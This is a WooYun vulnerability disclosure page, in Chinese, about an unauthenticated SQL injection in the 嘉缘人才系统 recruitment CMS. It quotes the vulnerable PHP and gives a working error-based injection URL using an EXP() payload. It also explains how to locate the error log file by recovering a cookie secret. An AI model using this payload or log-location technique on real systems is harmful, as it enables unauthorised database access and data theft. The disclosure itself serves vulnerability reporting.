当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121704

漏洞标题:嘉缘人才系统sql注入

相关厂商:finereason.com

漏洞作者: 牛肉包子

提交时间:2015-06-23 17:12

修复时间:2015-09-26 17:15

公开时间:2015-09-26 17:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-23: 细节已通知厂商并且等待厂商处理中
2015-06-28: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

无需登录,直接出数据

详细说明:

看到search\map_search.php

if($act=='showmap'){
    if($point){
        $points=explode(',',$point);
                var_dump($points);
        if(count($points)<4){echo "alert('数据异常,载入失败!');";exit();}
        echo "$(\".map_loading\").hide();
        map.clearOverlays();\r\n";
        $sql="select a.m_id,a.m_name,a.m_regdate,a.m_workers,a.m_ecoclass,a.m_trade,b.m_map from {$cfg['tb_pre']}member a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid WHERE a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd order by a.m_id desc";
        $counts = $db->counter("`{$cfg['tb_pre']}member` a INNER JOIN {$cfg['tb_pre']}member_map b ON a.m_id=b.m_mid","a.m_flag=1 AND $points[0]<SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1) AND SUBSTRING_INDEX(SUBSTRING_INDEX(b.m_map,':',-1),',',1)<$points[1] AND $points[2]<SUBSTRING_INDEX(b.m_map,',',-1) AND SUBSTRING_INDEX(b.m_map,',',-1)<$points[3] $sqladd");
        $page= isset($_GET['page'])?$_GET['page']:1;//默认页码
        $getpageinfo = page($page,$counts,"",20,5);
        $sql.=$getpageinfo['sqllimit'];
        $query=$db->query($sql);$i=0;$showinfolist=$showinfotip='';
        while($row=$db->fetch_array($query)){
            $maps=explode(':',$row['m_map']);
            if(count($maps)>1){
                $map=$maps[1];$i++;
                echo "var point$i = new BMap.Point($map);
                var myIcon = new BMap.Icon('{$cfg[siteurl]}{$cfg[path]}images/map/n$i.png', new BMap.Size(21,28));
                var marker$i = new BMap.Marker(point$i, {icon:myIcon});
                map.addOverlay(marker$i);
                var infoWindow$i = new BMap.InfoWindow(\"载入中...\",{width:420,height:180});
                marker$i.addEventListener(\"click\", function(){
                    map.openInfoWindow(infoWindow$i,new BMap.Point($map));
                });
                infoWindow$i.addEventListener(\"open\", function(){
                    if (infoWindow$i.getContent()=='载入中...'){
                        var htmhead='<p class=\"maplayername\"><a href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\" target=\"_blank\">{$row["m_name"]}</a><br><b>规模:</b>{$row["m_workers"]} <b>性质:</b>{$row["m_ecoclass"]} <b>行业:</b>{$row["m_trade"]}</p>';
                        var htmend='';
                        $.get(\"$cfg[path]inc/getinfo.php\",{id: {$row[m_id]}, s: 4, hn: 20, hl: 8},function(data){
                            infoWindow$i.setContent(htmhead+data+htmend)
                        });
                    }
                });\r\n";
                $showinfolist.="<li><img src=\"$cfg[path]images/map/nb$i.png\" align=\"absmiddle\" > <a id=\"a$i\" target=\"_blank\" href=\"".formatlink('company','company',$row['m_regdate'],$row['m_id'])."\">".sub_cnstrs($row["m_name"],16)."</a></li>";
                $showinfotip.="$('#showinfolist li a[id=\"a$i\"]').unbind().mouseover(function(){map.openInfoWindow(infoWindow$i,new BMap.Point($map));});\r\n";
            }
        }
        echo "$(\"#showinfolist\").html('$showinfolist');\r\n";
        echo $showinfotip;
    }
    exit();
}


其中$points未加单引号直接进入sql中,根据嘉缘人才系统的伪全局变量注册机制,我们直接可以注入。但是这个注入点是通过逗号来做分隔符的,并且count要大于4,所以我们构造如下exp

http://127.0.0.1/frcms/search/map_search.php?act=showmap&point=1=1 or char(@`'`) or EXP(~(select * from (select user())a))%23,aaa,aaa,aaaa,aaaaaa


QQ截图20150619223944.png


发现mysql报错了,这cms会把错误记录到一个文件里面。如下代码实现

function log_write($message, $type = 'php') {
        global $cfg, $fr_time, $username;
        $userip = getip();
    $fr_time or $fr_time = time();
        $user = $username ? $username : 'guest';
    dir_create(DATA_ROOT.'/log/');
    $log_file = DATA_ROOT.'/log/'.$type.'_'.md5($cfg['cookie_encode']).'.txt';
        $log = date('Y-m-d H:i:s', $fr_time)."||$userip||$user||".$_SERVER['SCRIPT_NAME']."||".str_replace('&', '&', $_SERVER['QUERY_STRING'])."||$message\r\n";
    $olog=file_get_contents($log_file);
    fputs(fopen($log_file,"w"), $log.$olog);
}
主要是要获取到$cfg['cookie_encode']这个值,然后就可以找到这个文件了
function _setcookie($var, $value = '', $time = 0) {
    global $cfg, $fr_time;
        $time = $time > 0 ? $fr_time+$time : (empty($value) ? $fr_time - 3600 : 0);
        $port = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
        $var = $cfg['cookie_pre'].$var;$value&&$value=base64_encode($value.$cfg['cookie_encode']);
        return setcookie($var, $value, $time, $cfg['cookie_path'], $cfg['cookie_domain'], $port);
}


然后我们可以找到文件位置为

漏洞证明:

QQ截图20150619224103.png

修复方案:

不知道

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-26 17:15

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无